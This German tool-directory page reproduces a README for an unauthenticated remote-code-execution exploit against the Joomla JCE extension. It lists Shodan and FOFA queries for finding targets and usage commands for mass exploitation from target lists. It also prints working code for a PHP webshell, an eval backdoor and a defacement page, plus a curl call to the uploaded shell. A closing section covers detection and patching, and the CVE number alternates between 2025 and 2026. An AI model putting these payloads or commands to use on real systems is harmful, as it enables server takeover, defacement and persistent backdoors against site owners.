Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Nicht authentifizierter RCE-Exploit für Joomla JCE < 2.9.99.5 | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Nicht authentifizierter RCE-Exploit für Joomla JCE < 2.9.99.5

Repository anzeigen
41vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Joomla-Logo

CVE-2026-48907 – Joomla! JCE Unauthenticated RCE

Joomla! JCE-Erweiterung < 2.9.99.5 – Unautorisierter PHP-Datei-Upload & Remote Code Execution

License: MIT Python 3.6+ Security Shodan FOFA


🔎 Suchmaschinenabfragen

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 Übersicht

Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2026-48907, eine kritische Sicherheitslücke in der Joomla! JCE (Joomla Content Editor) Erweiterung vor Version 2.9.99.5. Die Schwachstelle erlaubt unautorisierten Angreifern, beliebige PHP-Dateien über die JCE-Profilimport-Funktion hochzuladen, was zu Remote Code Execution (RCE) führt.

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Tests.

  • Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben
  • Der Autor übernimmt keine Verantwortung für Missbrauch oder illegale Aktivitäten
  • Holen Sie stets eine entsprechende Genehmigung ein, bevor Sie testen

🔍 Schwachstellendetails

Funktionsweise

  1. CSRF-Token-Extraktion: Der Exploit extrahiert zunächst das CSRF-Token von der Startseite des Ziels
  2. Profilimport-Missbrauch: Er nutzt die JCE-Profilimport-Funktionalität (index.php?option=com_jce&task=profiles.import)
  3. PHP-Datei-Upload: Lädt eine schädliche PHP-Datei hoch, die als Profil-XML-Datei getarnt ist
  4. Code-Ausführung: Die hochgeladene PHP-Datei wird im Verzeichnis /tmp/ abgelegt und kann über direkten Zugriff ausgeführt werden

🚀 Funktionen

  • ✅ Beliebige PHP-Datei hochladen: Eigene PHP-Shells, Backdoors oder Deface-Seiten hochladen (PHP-basiert)
  • ✅ Batch-Verarbeitung: Mehrere Ziele aus einer Datei scannen und ausnutzen
  • ✅ Automatische CSRF-Token-Erkennung: Extrahiert CSRF-Tokens automatisch
  • ✅ Ausführlicher Modus: Detaillierte Ausgabe zur Fehlerbehebung
  • ✅ Ergebnis-Export: Erfolgreiche Upload-URLs in einer Datei speichern

📦 Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Erforderliche Abhängigkeiten installieren
pip3 install requests urllib3

Voraussetzungen

  • Python 3.6 oder höher
  • requests-Bibliothek
  • urllib3-Bibliothek

🎯 Verwendung

Grundlegende Syntax

root@kitploit:~
python3 CVE-2025-48907.py -u <ZIEL_URL> -F <HOCHZULADENDE_PHP_DATEI>

Beispiele

PHP-Webshell hochladen

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

PHP-Deface-Seite hochladen

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

PHP-Backdoor hochladen

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

Batch-Ausnutzung mit Ziele-Datei

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

Mit ausführlicher Ausgabe und Ergebnisspeicherung

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

Befehlszeilenargumente

* Entweder -u oder -f muss angegeben werden

Format der Ziele-Datei

Erstellen Sie eine targets.txt-Datei mit einer URL pro Zeile:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Kommentare werden ignoriert
https://beispiel-joomla.com

🔧 Erstellen von PHP-Payloads

Alle Payloads müssen PHP-Dateien sein, da der Exploit PHP-Code hochlädt, der auf dem Server ausgeführt wird.

PHP-Webshell

Erstellen Sie shell.php:

root@kitploit:~
<?php
// Einfache PHP-Webshell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Verwendung: ?cmd=befehl";
}
?>

PHP-Deface-Seite

Erstellen Sie deface.php:

root@kitploit:~
<?php
// PHP-Deface-Seite
echo '<!DOCTYPE html>
<html>
<head>
    <title>Gehackt von 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>GEHACKT VON 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Sicherheit ist kein Produkt, sondern ein Prozess.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Zeit: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

PHP-Backdoor (Minimal)

Erstellen Sie backdoor.php:

root@kitploit:~
<?php
// Minimale PHP-Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 Beispielausgabe

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE-Erweiterung < 2.9.99.5 Unautorisierter RCE
Autor : 0xgh057r3c0n (PHP-Datei-Upload)

[*] 3 Ziel(e) geladen

[*] Ziel 1/3
[*] ==================================================
[+] Ziel: http://target-joomla.com
[+] CSRF-Token wird abgerufen...
[+] CSRF-Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] PHP-Datei wird hochgeladen: cve-2026-48907-1234.xml.php
[+] Profil erfolgreich importiert!
[+] Hochgeladene PHP-Datei wird getestet...

============================================================
[!!!!!] PHP-DATEI ERFOLGREICH HOCHGELADEN!
[!!!!!] SERVER IST ANFÄLLIG FÜR CVE-2025-48907!
============================================================

[+] Ihre hochgeladene PHP-Datei anzeigen: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Schnellzugriff:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ Erkennung & Abhilfe

Erkennungsmöglichkeiten

  • Überprüfen Sie das Verzeichnis /tmp/ auf verdächtige PHP-Dateien
  • Überwachen Sie die JCE-Profilimport-Aktivität in den Logs
  • Achten Sie auf unerwartete index.php?option=com_jce&task=profiles.import-Anfragen
  • Suchen Sie nach Dateien mit der Endung .xml.php in /tmp/
  • Überwachen Sie ungewöhnliche PHP-Ausführungen aus dem Verzeichnis /tmp/

Abhilfemaßnahmen

  1. JCE-Erweiterung aktualisieren:

    • Aktualisieren Sie auf Version 2.9.99.5 oder höher
    • Download unter: JCE Offizielle Website
  2. Temporäre Workarounds:

    • Deaktivieren Sie die JCE-Erweiterung, falls nicht benötigt
    • Implementieren Sie Web Application Firewall (WAF)-Regeln
    • Beschränken Sie die PHP-Ausführung im Verzeichnis /tmp/
    • Deaktivieren Sie allow_url_fopen, falls nicht erforderlich
  3. Maßnahmen nach einer Kompromittierung:

    • Entfernen Sie hochgeladene PHP-Dateien aus /tmp/
    • Überprüfen Sie das System auf Backdoors
    • Setzen Sie alle Zugangsdaten zurück (Joomla-Admin, FTP, Hosting)
    • Überprüfen Sie die Systemlogs auf unbefugten Zugriff
    • Suchen Sie nach weiteren kompromittierten Dateien

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

License: MIT


🤝 Mitwirken

Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull Request einzureichen.

  1. Forken Sie das Repository
  2. Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
  3. Committen Sie Ihre Änderungen (git commit -m 'Füge AmazingFeature hinzu')
  4. Pushen Sie zum Branch (git push origin feature/AmazingFeature)
  5. Öffnen Sie einen Pull Request

⭐ Sternenverlauf

Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen Stern ⭐ auf GitHub!


📞 Kontakt & Support

  • Autor: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • Issues: Einen Fehler melden

🔗 Referenzen

  • NVD – CVE-2025-48907
  • JCE Offizielle Website
  • Joomla! Sicherheitszentrum

Erstellt mit ❤️ von 0xgh057r3c0n
Tool herunterladen
EigenschaftWert
CVE-IDCVE-2026-48907
ProduktJoomla! JCE-Erweiterung
Betroffene Versionen< 2.9.99.5
SchwachstellentypUnautorisierter PHP-Datei-Upload → RCE
CVSS-Score9.8 (Kritisch)
AngriffsvektorNetzwerk
AuthentifizierungKeine erforderlich
AuswirkungVollständige Systemkompromittierung
ArgumentErforderlichBeschreibung
-u, --urlJa*Einzelne Ziel-URL (z. B. http://target.com)
-f, --fileJa*Datei mit Liste der Ziel-URLs (eine pro Zeile)
-F, --upload-fileJaHochzuladende PHP-Datei (Shell, Backdoor, Deface-Seite)
-v, --verboseNeinAusführliche Ausgabe zur Fehlerbehebung aktivieren
-o, --outputNeinErfolgreiche Upload-URLs in Datei speichern